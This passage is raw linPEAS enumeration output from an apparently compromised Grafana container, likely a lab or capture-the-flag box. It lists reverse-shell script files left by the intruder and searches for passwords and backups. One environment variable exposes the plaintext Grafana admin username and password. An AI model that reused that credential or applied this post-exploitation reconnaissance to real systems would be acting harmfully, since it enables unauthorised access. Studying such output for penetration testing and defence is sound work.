-rw-r--r--  1 root    root 34523 May 14  2024 LICENSE
drwxr-xr-x  2 root    root  4096 May 14  2024 bin
drwxr-xr-x  3 root    root  4096 May 14  2024 conf
-rw-r--r--  1 root    root  3712 Aug  9 09:30 perl-reverse-shell.pl
drwxr-xr-x 16 root    root  4096 May 14  2024 public
-rw-r--r--  1 root    root  3714 Aug  9 09:38 rev.pl

╔══════════╣ Files inside others home (limit 20)
                                                                                                                                       
╔══════════╣ Searching installed mail applications
                                                                                                                                       
╔══════════╣ Mails (limit 50)
                                                                                                                                       
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Apr 18  2022 /var/backups                                                                                  
total 0


╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 0 Apr 27  2024 /var/lib/systemd/deb-systemd-helper-enabled/timers.target.wants/dpkg-db-backup.timer             
-rw-r--r-- 1 root root 61 Apr 27  2024 /var/lib/systemd/deb-systemd-helper-enabled/dpkg-db-backup.timer.dsh-also
-rw-r--r-- 1 root root 147 Dec  5  2021 /usr/lib/systemd/system/dpkg-db-backup.service
-rw-r--r-- 1 root root 138 Dec  5  2021 /usr/lib/systemd/system/dpkg-db-backup.timer
-rwxr-xr-x 1 root root 2196 Feb 23  2024 /usr/libexec/dpkg/dpkg-db-backup

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/grafana/grafana.db                                                                                                      


╔══════════╣ Web files?(output limit)
                                                                                                                                       
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 220 Jan  6  2022 /etc/skel/.bash_logout                                                                         
-rw------- 1 root root 0 Apr 27  2024 /etc/.pwd.lock

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 24 Aug  8 16:11 /tmp/tH1fu                                                                                      
-rw-r--r-- 1 root root 229 Aug  9 09:42 /tmp/grafana_cmd_output
-rwxr-xr-x 1 root root 954437 Aug  8 20:15 /tmp/linpeas.sh
-rw-r--r-- 1 root root 42 Aug  8 19:28 /tmp/KY9Om
-rw-r--r-- 1 root root 80 Aug  9 02:12 /tmp/rev
-rw-r--r-- 1 root root 1055 Aug  9 09:48 /tmp/rev.pl
-rw-r--r-- 1 root root 39 Aug  8 19:28 /tmp/GEOYY
-rw-r--r-- 1 root root 0 Aug  8 23:46 /tmp/rshell.sh
-rw-r--r-- 1 root root 42 Aug  8 16:12 /tmp/oeh5u

╔══════════╣ Searching passwords in history files
/usr/share/grafana/.bash_history:ls root                                                                                               
/usr/share/grafana/.bash_history:cd root
/usr/share/grafana/.bash_history:sudo -l
/usr/share/grafana/public/sass/pages/_history.scss:@for $i from 0 through 16 {
/usr/share/grafana/public/sass/pages/_history.scss:.diff-linenum {

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password                                                                                                             
/usr/share/grafana/public/app/partials/reset_password.html
/usr/share/grafana/public/app/plugins/datasource/azuremonitor/credentials.ts
/usr/share/grafana/public/emails/reset_password.html
/usr/share/grafana/public/emails/reset_password.txt
/usr/share/pam/common-password
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                                                                       
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                                                                       
╔══════════╣ Searching passwords inside logs (limit 70)
/var/log/apt/history.log:Commandline: apt-get install --reinstall base-passwd                                                          
/var/log/apt/history.log:Commandline: apt-get install --reinstall passwd
/var/log/apt/history.log:Reinstall: base-passwd:amd64 (3.5.52build1)
/var/log/apt/history.log:Reinstall: passwd:amd64 (1:4.8.1-2ubuntu2)
/var/log/bootstrap.log: base-passwd depends on libc6 (>= 2.34); however:
/var/log/bootstrap.log: base-passwd depends on libdebconfclient0 (>= 0.145); however:
/var/log/bootstrap.log:Preparing to unpack .../base-passwd_3.5.52build1_amd64.deb ...
/var/log/bootstrap.log:Preparing to unpack .../passwd_1%3a4.8.1-2ubuntu2_amd64.deb ...
/var/log/bootstrap.log:Selecting previously unselected package base-passwd.
/var/log/bootstrap.log:Selecting previously unselected package passwd.
/var/log/bootstrap.log:Setting up base-passwd (3.5.52build1) ...
/var/log/bootstrap.log:Setting up passwd (1:4.8.1-2ubuntu2) ...
/var/log/bootstrap.log:Shadow passwords are now on.
/var/log/bootstrap.log:Unpacking base-passwd (3.5.52build1) ...
/var/log/bootstrap.log:Unpacking base-passwd (3.5.52build1) over (3.5.52build1) ...
/var/log/bootstrap.log:Unpacking passwd (1:4.8.1-2ubuntu2) ...
/var/log/bootstrap.log:dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
/var/log/dpkg.log:2024-04-27 02:02:35 configure base-passwd:amd64 3.5.52build1 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:35 install base-passwd:amd64 <none> 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:35 status half-configured base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:35 status half-installed base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:35 status installed base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:35 status unpacked base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:36 status half-configured base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:36 status half-installed base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:36 status unpacked base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:36 upgrade base-passwd:amd64 3.5.52build1 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:38 configure base-passwd:amd64 3.5.52build1 <none>
/var/log/dpkg.log:2024-04-27 02:02:38 install passwd:amd64 <none> 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:02:38 status half-configured base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:38 status half-installed passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:02:38 status installed base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:38 status unpacked base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:38 status unpacked passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:02:39 configure passwd:amd64 1:4.8.1-2ubuntu2 <none>
/var/log/dpkg.log:2024-04-27 02:02:39 status half-configured passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:02:39 status installed passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:02:39 status unpacked passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:02:48 configure base-passwd:amd64 3.5.52build1 <none>
/var/log/dpkg.log:2024-04-27 02:02:48 status half-configured base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:48 status half-installed base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:48 status installed base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:48 status unpacked base-passwd:amd64 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:02:48 upgrade base-passwd:amd64 3.5.52build1 3.5.52build1
/var/log/dpkg.log:2024-04-27 02:05:24 configure passwd:amd64 1:4.8.1-2ubuntu2 <none>
/var/log/dpkg.log:2024-04-27 02:05:24 status half-configured passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:05:24 status half-installed passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:05:24 status installed passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:05:24 status unpacked passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:05:24 upgrade passwd:amd64 1:4.8.1-2ubuntu2 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:05:52 configure passwd:amd64 1:4.8.1-2ubuntu2.2 <none>
/var/log/dpkg.log:2024-04-27 02:05:52 status half-configured passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:05:52 status half-configured passwd:amd64 1:4.8.1-2ubuntu2.2
/var/log/dpkg.log:2024-04-27 02:05:52 status half-installed passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:05:52 status installed passwd:amd64 1:4.8.1-2ubuntu2.2
/var/log/dpkg.log:2024-04-27 02:05:52 status unpacked passwd:amd64 1:4.8.1-2ubuntu2
/var/log/dpkg.log:2024-04-27 02:05:52 status unpacked passwd:amd64 1:4.8.1-2ubuntu2.2
/var/log/dpkg.log:2024-04-27 02:05:52 upgrade passwd:amd64 1:4.8.1-2ubuntu2 1:4.8.1-2ubuntu2.2

╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars
AWS_AUTH_AllowedAuthProviders=default,keys,credentials                                                                                 
AWS_AUTH_AssumeRoleEnabled=true
AWS_AUTH_EXTERNAL_ID=
AWS_AUTH_SESSION_DURATION=15m
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_HOME=/usr/share/grafana
GF_PATHS_LOGS=/var/log/grafana
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
HISTFILE=/dev/null
HOME=/usr/share/grafana
HOSTNAME=7ce659d667d7
OLDPWD=/root
OLDPWD=/usr/share/grafana
OLDPWD=/usr/share/grafana/conf
PWD=/
PWD=/tmp
PWD=/usr/share/grafana
SHLVL=0
SHLVL=1
TERM=xterm
_=/usr/bin/dd
_=/usr/bin/grep
_=/usr/bin/sh
_=linpeas.sh
_=tH1fu


                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════                                                     
                                ╚════════════════╝                                                                                     
Regexes to search for API keys aren't activated, use param '-r' 


# # # # # # # # # # # # # # # # # #
